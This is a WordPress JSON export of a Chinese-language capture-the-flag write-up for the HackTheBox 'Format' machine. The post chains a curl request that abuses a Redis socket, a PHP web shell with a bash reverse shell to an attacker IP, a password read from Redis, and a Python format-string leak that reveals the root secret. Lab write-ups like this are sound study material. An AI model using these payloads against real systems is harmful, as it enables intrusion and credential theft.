{"id":901,"date":"2023-09-01T08:47:06","date_gmt":"2023-09-01T00:47:06","guid":{"rendered":"http:\/\/119.45.47.125\/?p=901"},"modified":"2023-09-10T14:27:23","modified_gmt":"2023-09-10T06:27:23","slug":"hackthebox-format","status":"publish","type":"post","link":"http:\/\/119.45.47.125\/index.php\/2023\/09\/01\/hackthebox-format\/","title":{"rendered":"HackTheBox-Format"},"content":{"rendered":"<p>\u8fde\u63a5\u540e\u4fe1\u606f\u6536\u96c6\uff0c\u5f00\u653e\u4e86 3000 \u7aef\u53e3\uff0c\u5b58\u5728\u5b50\u57df\u540d <code>app.microblog.htb<\/code>\uff0c\u90fd\u5b58\u5728\u767b\u5f55\u63a5\u53e3<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/08\/1693476784-1-1024x479.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/08\/1693476784-1-1024x479.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u5f00\u6e90\u94fe\u63a5\u6307\u5411\u7684\u662f <a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/github.com\/go-gitea\/gitea\" title=\"Gitea\">Gitea<\/a>\uff0c<code>\/cooper\/microblog<\/code> \u6258\u7ba1\u4e86\u6e90\u7801<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/08\/1693476816-2-1024x511.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/08\/1693476816-2-1024x511.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>app \u4e0b\u7684\u4e3b\u8981\u529f\u80fd\u5c31\u662f\u751f\u6210\u4e00\u4e2a\u57df\u540d\uff0c\u7136\u540e\u53ef\u4ee5\u81ea\u5df1\u6dfb\u52a0\u4e1c\u897f\uff0c\u7c7b\u4f3c<code>github.io<\/code> \u90a3\u4e00\u79cd\u7684\u535a\u5ba2\u7f51\u7ad9<\/p>\n<p>\u628a\u6e90\u7801\u4e0b\u8f7d\u4e0b\u6765\uff0c\u53d1\u73b0\u5b58\u5728\u5bf9 redis \u670d\u52a1\u7684\u4ea4\u4e92\uff0c\u5ba1\u8ba1 <code>edit.php<\/code> \u7684\u6e90\u7801<\/p>\n<pre><code class=\"language-php line-numbers\">&lt;?php\n...\n\nif (isset($_POST['txt']) &amp;&amp; isset($_POST['id'])) {\n    chdir(getcwd() . \"\/..\/content\");\n    $txt_nl = nl2br($_POST['txt']);\n    $html = \"&lt;div class = \\\"blog-text\\\"&gt;{$txt_nl}&lt;\/div&gt;\";\n    $post_file = fopen(\"{$_POST['id']}\", \"w\");\n    fwrite($post_file, $html);\n    fclose($post_file);\n    $order_file = fopen(\"order.txt\", \"a\");\n    fwrite($order_file, $_POST['id'] . \"\\n\");  \n    fclose($order_file);\n    header(\"Location: \/edit?message=Section added!&amp;status=success\");\n}\n\n...\n\nfunction fetchPage() {\n    chdir(getcwd() . \"\/..\/content\");\n    $order = file(\"order.txt\", FILE_IGNORE_NEW_LINES);\n    $html_content = \"\";\n    foreach($order as $line) {\n        $temp = $html_content;\n        $html_content = $temp . \"&lt;div class = \\\"{$line} blog-indiv-content\\\"&gt;\" . file_get_contents($line) . \"&lt;\/div&gt;\";\n    }\n    return $html_content;\n}\n...\n?&gt;\n<\/code><\/pre>\n<p>\u903b\u8f91\u5176\u5b9e\u5f88\u7b80\u5355\uff0c\u5728 <code>add<\/code> \u7684\u51e0\u4e2a\u76f8\u5173\u90e8\u5206\uff0c\u90fd\u662f POST \u4e24\u4e2a\u53c2\u6570\u8fdb\u53bb\uff0c\u7136\u540e <code>fetchPage()<\/code> \u518d\u8bfb\u51fa\u6765\uff0c\u6293\u5305\u7684\u65f6\u5019 id \u662f\u968f\u673a\u7684 11 \u4f4d\u5b57\u7b26\uff0c\u4f46\u662f\u4eba\u4e3a\u53ef\u63a7\uff0c\u6240\u4ee5\u5b58\u5728\u4efb\u610f\u8bfb\u548c\u4efb\u610f\u5199<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/08\/1693481447-3-1024x437.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/08\/1693481447-3-1024x437.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u4f46\u662f\u4e0d\u80fd\u5728\u5f53\u524d\u9875\u9762\u4e0b\u5199\u5165\u53ef\u6267\u884c\u4ee3\u7801\uff0c\u56e0\u4e3a\u4f1a\u88ab HTML \u6ce8\u91ca\u6389<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/09\/1693620703-1-1024x434.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/09\/1693620703-1-1024x434.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u6ce8\u610f\u5230\u4ee3\u7801\u91cc\u8fd8\u6709\u4e00\u4e2a <code>isPro()<\/code> \u7684\u8ba4\u8bc1\u64cd\u4f5c\uff0c\u540c\u65f6\u5728 <code>provisionProUser<\/code> \u91cc\u521b\u5efa\u4e86 pro \u7528\u6237\u7684\u4e13\u7528\u6587\u4ef6\u5939\uff0c\u90a3\u4e48\u5982\u4f55\u6210\u4e3a pro \u7528\u6237\u5462<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/09\/1693622024-2.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/09\/1693622024-2.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u6240\u4ee5\u9700\u8981\u7b80\u5355\u6784\u9020\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash line-numbers\">curl -X \"HSET\" http:\/\/microblog.htb\/static\/unix:%2fvar%2frun%2fredis%2fredis.sock:q%20pro%20true%20\/b\n<\/code><\/pre>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/09\/1693623321-3-1024x470.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/09\/1693623321-3-1024x470.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u7136\u540e\u5728 edit \u4e0b\u53d1\u5305<\/p>\n<pre data-language=\"HTML\"><code class=\"language-markup line-numbers\">id=\/var\/www\/microblog\/myblog\/uploads\/aaa.php&amp;txt=&lt;%3fphp+system(\"\/bin\/bash+-c+'bash+-i+&gt;%26+\/dev\/tcp\/10.10.14.xx\/8888+0&gt;%261'\")%3b%3f&gt;\n<\/code><\/pre>\n<p>\u518d\u8bbf\u95ee <code>myblog.microblog.htb\/uploads\/aaa.php<\/code> \u89e6\u53d1<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/09\/1693642047-3-1024x167.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/09\/1693642047-3-1024x167.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u4f46\u662f\u5f53\u524d\u6743\u9650\u662f www-data\uff0c\u6ca1\u529e\u6cd5\u8bfb\u53d6 \/home\/ \u4e0b\u7684\u6587\u4ef6\uff0c\u8003\u8651\u5230\u5b58\u5728 redis\uff0c\u5c1d\u8bd5\u8bfb\u53d6 cooper \u7684\u5bc6\u7801<\/p>\n<pre><code class=\"language-bash line-numbers\">&gt; redis-cli -s \/var\/run\/redis\/redis.sock\n\n&gt; keys *\n\n&gt; hgetall cooper.dooper\n<\/code><\/pre>\n<p>SSH \u8fde\u63a5\u5373\u53ef\uff0c<code>sudo -l<\/code> \u67e5\u770b<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/09\/1693642597-1-1024x131.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/09\/1693642597-1-1024x131.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u4e0d\u592a\u6e05\u695a\u662f\u5e72\u5565\u7684\uff0c<code>sudo \/usr\/bin\/license --help<\/code><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/09\/1693642940-2-1024x163.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/09\/1693642940-2-1024x163.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u662f\u4e2a Python \u6587\u4ef6<\/p>\n<pre><code class=\"language-python line-numbers\">#!\/usr\/bin\/python3\n\nimport base64\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC\nfrom cryptography.fernet import Fernet\nimport random\nimport string\nfrom datetime import date\nimport redis\nimport argparse\nimport os\nimport sys\n\nclass License():\n    def __init__(self):\n        chars = string.ascii_letters + string.digits + string.punctuation\n        self.license = ''.join(random.choice(chars) for i in range(40))\n        self.created = date.today()\n\nif os.geteuid() != 0:\n    print(\"\")\n    print(\"Microblog license key manager can only be run as root\")\n    print(\"\")\n    sys.exit()\n\nparser = argparse.ArgumentParser(description='Microblog license key manager')\ngroup = parser.add_mutually_exclusive_group(required=True)\ngroup.add_argument('-p', '--provision', help='Provision license key for specified user', metavar='username')\ngroup.add_argument('-d', '--deprovision', help='Deprovision license key for specified user', metavar='username')\ngroup.add_argument('-c', '--check', help='Check if specified license key is valid', metavar='license_key')\nargs = parser.parse_args()\n\nr = redis.Redis(unix_socket_path='\/var\/run\/redis\/redis.sock')\n\nsecret = [line.strip() for line in open(\"\/root\/license\/secret\")][0]\nsecret_encoded = secret.encode()\nsalt = b'microblogsalt123'\nkdf = PBKDF2HMAC(algorithm=hashes.SHA256(),length=32,salt=salt,iterations=100000,backend=default_backend())\nencryption_key = base64.urlsafe_b64encode(kdf.derive(secret_encoded))\n\nf = Fernet(encryption_key)\nl = License()\n\n#provision\nif(args.provision):\n    user_profile = r.hgetall(args.provision)\n    if not user_profile:\n        print(\"\")\n        print(\"User does not exist. Please provide valid username.\")\n        print(\"\")\n        sys.exit()\n    existing_keys = open(\"\/root\/license\/keys\", \"r\")\n    all_keys = existing_keys.readlines()\n    for user_key in all_keys:\n        if(user_key.split(\":\")[0] == args.provision):\n            print(\"\")\n            print(\"License key has already been provisioned for this user\")\n            print(\"\")\n            sys.exit()\n    prefix = \"microblog\"\n    username = r.hget(args.provision, \"username\").decode()\n    firstlast = r.hget(args.provision, \"first-name\").decode() + r.hget(args.provision, \"last-name\").decode()\n    license_key = (prefix + username + \"{license.license}\" + firstlast).format(license=l)\n    print(\"\")\n    print(\"Plaintext license key:\")\n    print(\"------------------------------------------------------\")\n    print(license_key)\n    print(\"\")\n    license_key_encoded = license_key.encode()\n    license_key_encrypted = f.encrypt(license_key_encoded)\n    print(\"Encrypted license key (distribute to customer):\")\n    print(\"------------------------------------------------------\")\n    print(license_key_encrypted.decode())\n    print(\"\")\n    with open(\"\/root\/license\/keys\", \"a\") as license_keys_file:\n        license_keys_file.write(args.provision + \":\" + license_key_encrypted.decode() + \"\\n\")\n\n#deprovision\nif(args.deprovision):\n    print(\"\")\n    print(\"License key deprovisioning coming soon\")\n    print(\"\")\n    sys.exit()\n\n#check\nif(args.check):\n    print(\"\")\n    try:\n        license_key_decrypted = f.decrypt(args.check.encode())\n        print(\"License key valid! Decrypted value:\")\n        print(\"------------------------------------------------------\")\n        print(license_key_decrypted.decode())\n    except:\n        print(\"License key invalid\")\n    print(\"\")\n<\/code><\/pre>\n<p>\u56e0\u4e3a\u9776\u673a\u7684\u540d\u5b57\u662f format\uff0c\u53ef\u80fd\u548c\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u7684\u6f0f\u6d1e\u6709\u5173\uff0c\u95ee\u9898\u51fa\u73b0\u5728 <code>license_key = (prefix + username + &quot;{license.license}&quot; + firstlast).format(license=l)<\/code><\/p>\n<p><code>username<\/code> \u548c <code>firstlast<\/code> \u5747\u53ef\u63a7\uff0c\u6240\u4ee5\u53ea\u9700\u8981 HSET \u4e00\u6bb5\u6784\u9020\u597d\u7684\u6570\u636e\u5373\u53ef\u5229\u7528<\/p>\n<pre><code class=\"language-bash line-numbers\">HSET aaa username aaa password aaa first-name {license.__init__.__globals__} last-name aaa\n<\/code><\/pre>\n<p>\u7136\u540e <code>sudo \/usr\/bin\/license -p aaa<\/code><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/09\/1693646018-1-1024x446.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/09\/1693646018-1-1024x446.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p><code>secret<\/code> \u7684\u503c\u5c31\u662f root \u7684\u5bc6\u7801\uff0c\u5207\u6362\u767b\u9646\u5373\u53ef<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/09\/1693646138-3-1024x78.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/09\/1693646138-3-1024x78.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>","protected":false},"excerpt":{"rendered":"\u8fde\u63a5\u540e\u4fe1\u606f\u6536\u96c6\uff0c\u5f00\u653e\u4e86 3000 \u7aef\u53e3\uff0c\u5b58\u5728\u5b50\u57df\u540d app.microblog.htb\uff0c\u90fd\u5b58\u5728\u767b\u5f55\u63a5\u53e3 \u5f00\u6e90\u94fe [&hellip;]","protected":false},"author":1,"featured_media":919,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[35,26],"tags":[36],"class_list":["post-901","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-study","tag-hackthebox"],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/119.45.47.125\/wp-content\/uploads\/2023\/09\/1693646500-2.png?fit=433%2C181","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/901","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/comments?post=901"}],"version-history":[{"count":5,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/901\/revisions"}],"predecessor-version":[{"id":917,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/posts\/901\/revisions\/917"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/media\/919"}],"wp:attachment":[{"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/media?parent=901"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/categories?post=901"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/119.45.47.125\/index.php\/wp-json\/wp\/v2\/tags?post=901"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}